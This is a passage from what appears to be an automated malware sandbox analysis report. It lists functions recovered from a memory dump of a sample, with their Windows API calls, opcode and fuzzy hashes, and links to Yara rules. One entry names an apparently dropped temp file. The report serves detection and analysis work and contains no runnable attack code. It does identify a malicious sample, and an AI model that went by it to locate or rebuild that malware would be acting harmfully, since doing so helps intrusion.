                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                            • String ID: X
                            • API String ID: 85490731-3081909835
                            • Opcode ID: 8d81a44eba8dbe21148f0bd85642ee695a9fb500af3ca402a42969445c6dbe12
                            • Instruction ID: 9efc87540b1ae4ff28e75dde81c79541b4f2a82d82a77cf50ca367063be7fad6
                            • Opcode Fuzzy Hash: 8d81a44eba8dbe21148f0bd85642ee695a9fb500af3ca402a42969445c6dbe12
                            • Instruction Fuzzy Hash: 1011A0B1B002489BDB11DBD9D8457EEBBF9AF85304F508119E514EB281DBB4084A8BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A92AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc
                            • String ID:
                            • API String ID: 2388904642-0
                            • Opcode ID: 1e18bd171259040739975cde0cf28159a7933f9e41db7f3f96b0989130aea6dc
                            • Instruction ID: 7d9c8804393e9e20d288fbedf1bb41b966dda00e194ee4efe73f089ba01cfb67
                            • Opcode Fuzzy Hash: 1e18bd171259040739975cde0cf28159a7933f9e41db7f3f96b0989130aea6dc
                            • Instruction Fuzzy Hash: A6F1B275A04209ABCF14EF54C981AFEB3F5FF44300F614466E855AB262D735EE82CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9B1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 4e06d6e2f994435f03e116b57a503f4287a55f9d151f25d24f45ac3f546027c6
                            • Instruction ID: e547b0b0b7b86b4800566d1513b9bf688154d515bd410a1337cad9e2d57ea686
                            • Opcode Fuzzy Hash: 4e06d6e2f994435f03e116b57a503f4287a55f9d151f25d24f45ac3f546027c6
                            • Instruction Fuzzy Hash: 29916C70A10204DFDF14DF68DA85AAEB7F9AF49300F24C569E8059F256E735EC41CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32 ref: 00A9D979
                            • FreeLibrary.KERNEL32(?), ref: 00A9D98E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeInfoLibraryParametersSystem
                            • String ID:
                            • API String ID: 3403648963-0
                            • Opcode ID: ba72c265b77373fc9509b1474c7abb8f8988704323a28a79bf237cb4a435f647
                            • Instruction ID: 5e1d73f3a937fa3778b6b8ae846a2ee80559e2160d968cf9bb3466a64a545f59
                            • Opcode Fuzzy Hash: ba72c265b77373fc9509b1474c7abb8f8988704323a28a79bf237cb4a435f647
                            • Instruction Fuzzy Hash: 3B218BB1A08301AFC710EF19DD8195ABBE5FB88314F40492DF88897362DB71E946CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _malloc_wcscpy_wcslen
                            • String ID:
                            • API String ID: 245337311-0
                            • Opcode ID: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
                            • Instruction ID: 692c4cfc7a8e4f8dfec816393c72d3c5a0d5033ce655395544ea3fda94b8ec88
                            • Opcode Fuzzy Hash: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
                            • Instruction Fuzzy Hash: 501143B1600B40AFD724DB69C442E26B7F4EB4A310F04C82EE89A8BB91D735E845CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA07A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00A9E094,?,00000001,?,00A93653,?), ref: 00AA07CA
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00A9E094,?,00000001,?,00A93653,?), ref: 00AB6296
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 3c57d0974c84ca68a0c39c9783e26f5e20dbff94beb6c9e61484a14b89773eae
                            • Instruction ID: f586a7335c89ff557bc9fcf90b75096a8385b05b3c112bf64cf3e8802c758dc3
                            • Opcode Fuzzy Hash: 3c57d0974c84ca68a0c39c9783e26f5e20dbff94beb6c9e61484a14b89773eae
                            • Instruction Fuzzy Hash: C8018C30784B00BAF2315B289C5BF912694AB06B20F244715B7E5BF1E2D7F878828A44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A916A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A916E5
                              • Part of subcall function 00A92390: _wcslen.LIBCMT ref: 00A9239D
                              • Part of subcall function 00A92390: _memmove.LIBCMT ref: 00A923C3
                            • _wcscat.LIBCMT ref: 00AB8BC8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat_wcslen
                            • String ID:
                            • API String ID: 189345764-0
                            • Opcode ID: dc2e370f69dd7bcdaa70828fdf271e8b6eea948d85a2b3acbc2806f7a88d96c0
                            • Instruction ID: eab4824b10f2f4c3fdf9f5a3fb459355462c46bf431676d1fcc8d164ce0e1f33
                            • Opcode Fuzzy Hash: dc2e370f69dd7bcdaa70828fdf271e8b6eea948d85a2b3acbc2806f7a88d96c0
                            • Instruction Fuzzy Hash: 8201847574020DA7CF10EBB4DE85ADFB3F8DF15300F1045D5B90597242EE759A858BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA4966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA7E9A: __getptd_noexit.LIBCMT ref: 00AA7E9A
                            • __lock_file.LIBCMT ref: 00AA49AD
                              • Part of subcall function 00AA5391: __lock.LIBCMT ref: 00AA53B6
                            • __fclose_nolock.LIBCMT ref: 00AA49B8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: d5e0239c53a8fffd89e7567fcd441bfffa1cd230a0fd3d7f5e9c5a7f8d465cab
                            • Instruction ID: 7dc95d01c62b8b556fa8beaf2d89eb7088006595aad7576d4e0fc9494741f01e
                            • Opcode Fuzzy Hash: d5e0239c53a8fffd89e7567fcd441bfffa1cd230a0fd3d7f5e9c5a7f8d465cab
                            • Instruction Fuzzy Hash: E5F0B431900715DADB20ABB4890279F7BA06F4B330F248659F475AB1D2CBBC89129F56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 00A9D5DC
                              • Part of subcall function 00A99430: PeekMessageW.USER32 ref: 00A994B6
                            • Sleep.KERNEL32(00000000), ref: 00ABE125
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessagePeekSleepTimetime
                            • String ID:
                            • API String ID: 1792118007-0
                            • Opcode ID: fd1f67e85b26cb530dd02839755b7971166fa67f7f950c90bfdc003144bbc1af
                            • Instruction ID: a54114098f6ec610f41a464d2783ad642ba1321d3537d0e48545248bc4fe2c18
                            • Opcode Fuzzy Hash: fd1f67e85b26cb530dd02839755b7971166fa67f7f950c90bfdc003144bbc1af
                            • Instruction Fuzzy Hash: 26F0B830200602AFC304EB28D949BA6BBE8AB85760F508129E82EC7290DF70A800CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA15A2, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            • ___crtCorExitProcess.LIBCMT ref: 00AA15AA
                              • Part of subcall function 00AA1577: GetModuleHandleW.KERNEL32(mscoree.dll,?,00AA15AF,?,?,00AA350A,000000FF,0000001E,00000001,00000000,00000000,?,00AA6A35,?,00000001,?), ref: 00AA1581
                              • Part of subcall function 00AA1577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AA1591
                            • ExitProcess.KERNEL32 ref: 00AA15B3
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                            • String ID:
                            • API String ID: 2427264223-0
                            • Opcode ID: a5c99c9409ad8ae114e420f1dfe561036ff177610d78f49c7cef060b75a47488
                            • Instruction ID: 118b7d8a4b45be0b41023ea3c32d9e51a29b48a0661c406692177a77ae770dc4
                            • Opcode Fuzzy Hash: a5c99c9409ad8ae114e420f1dfe561036ff177610d78f49c7cef060b75a47488
                            • Instruction Fuzzy Hash: 22B09B314001487FCB052F11ED0E84D3F55DB81350B504014F51507071DF719F519584
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93D20, Relevance: 2.6, APIs: 2, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00A9378C,?,?,?,00000010), ref: 00A93D38
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00A93D71
                              • Part of subcall function 00A93DA0: _memmove.LIBCMT ref: 00A93DD7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharMultiWide$_malloc_memmove
                            • String ID:
                            • API String ID: 961785871-0
                            • Opcode ID: 67714d11107f6df653c36fe417fe9520a55db50901f934a14d5318be2903460d
                            • Instruction ID: faf7fd37e298ed99dea45a1f598187a59526a7d0435fdb215a98ce4c9f69d11d
                            • Opcode Fuzzy Hash: 67714d11107f6df653c36fe417fe9520a55db50901f934a14d5318be2903460d
                            • Instruction Fuzzy Hash: 6201D6723442007FEB509768DD46FAB77ECDB89B50F104029FA09DB2C1D9B1ED1082A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFF94D, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • _memmove.LIBCMT ref: 00AFFAAB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _malloc_memmove
                            • String ID:
                            • API String ID: 1183979061-0
                            • Opcode ID: fd2a6767064dcd6dcd381872ad886584352814771ae61b049605fe65a4266f64
                            • Instruction ID: 3ff696d04d5fd25a5e213a6a998c25994573faf37ce12e93d947577d1a4265c4
                            • Opcode Fuzzy Hash: fd2a6767064dcd6dcd381872ad886584352814771ae61b049605fe65a4266f64
                            • Instruction Fuzzy Hash: 355194B6304205AFCB10EF64CE82F6AB3E9AF89710F144569FA559B382D731ED05C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9B650, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65c8b29cfe20d1a1b9703d389f1749600054ef56cfc0e6daeab24083c662b62e
                            • Instruction ID: 353e3e0128815b63224ab2df45970f885887d8131923cc20efd1443cdf4d3960
                            • Opcode Fuzzy Hash: 65c8b29cfe20d1a1b9703d389f1749600054ef56cfc0e6daeab24083c662b62e
                            • Instruction Fuzzy Hash: 09317375720301EBCF20EF68EB82E26B3E8AF51B50F244919E6058B251D735F894C7B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93130, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 4876ffcba8482726e52f033019541679edb7f75d70a134971b61a7a71de6ff86
                            • Instruction ID: 4fd5274fd7c310e0824d8b9a67370415d1fa4500320bd0e58dc41f1b83afb7f1
                            • Opcode Fuzzy Hash: 4876ffcba8482726e52f033019541679edb7f75d70a134971b61a7a71de6ff86
                            • Instruction Fuzzy Hash: F5317E71E04208EBDF008FA6E9426EEFBF8FF40701F2085AAD855D6661F7399A90D740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A929B0, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
                            • Instruction ID: f3f0b0c45a642d4e0393215edc2d5565faa53eba0ef93fd4bfbd7e53eac857fd
                            • Opcode Fuzzy Hash: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
                            • Instruction Fuzzy Hash: 64316BBA600611EFCB24DF28C581A61F7E0FF09750B14C569D989CBB96E731EC52CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A931B0, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 019ee8ebf15400a281e4ec07302b3ea7c2cc7cd12908ddc18e5a78aae465cc8f
                            • Instruction ID: ba0548787a9e9fe0c9fed0310da55eff3ccf9f3e2627e04469c8c6c189e726c8
                            • Opcode Fuzzy Hash: 019ee8ebf15400a281e4ec07302b3ea7c2cc7cd12908ddc18e5a78aae465cc8f
                            • Instruction Fuzzy Hash: E2315E71B042059FCB24EF68C5819AAB3F5FF58304B20C55DE5968B352EB72EE51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E1B0, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 00A9E248
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 653ddb856882b804309c71ec9bd82961583d48af013e00df3c32506ca017f462
                            • Instruction ID: 2aaf8a679b57a321ef2bb4df8b6d32e2d501473b2fc9a0d440e8a20f6eabf8db
                            • Opcode Fuzzy Hash: 653ddb856882b804309c71ec9bd82961583d48af013e00df3c32506ca017f462
                            • Instruction Fuzzy Hash: 7D310D71B007059FCF28CF6DD98499AB7FAFB88710B15CA2EE45A87702D631F9458B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADC02F, Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: b8b611e46c09d6313e779c5787d4da2cc80c8e487c62e041b92b2e0965d7f1ca
                            • Instruction ID: efa0509d7a5acf6a4cc4658525869d4a345144968e3157929c0fb914e549b63d
                            • Opcode Fuzzy Hash: b8b611e46c09d6313e779c5787d4da2cc80c8e487c62e041b92b2e0965d7f1ca
                            • Instruction Fuzzy Hash: BD316170600609EBDF009F16DA416AA7BF4FF44761F60C92AFC9ACA750E734D690DB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEC98D, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • GetShortPathNameW.KERNELBASE ref: 00AECA1A
                              • Part of subcall function 00A9F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00A9F1F5,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00B390E8,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,?,00A9F1F5,?,?,00000001), ref: 00A9F23C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
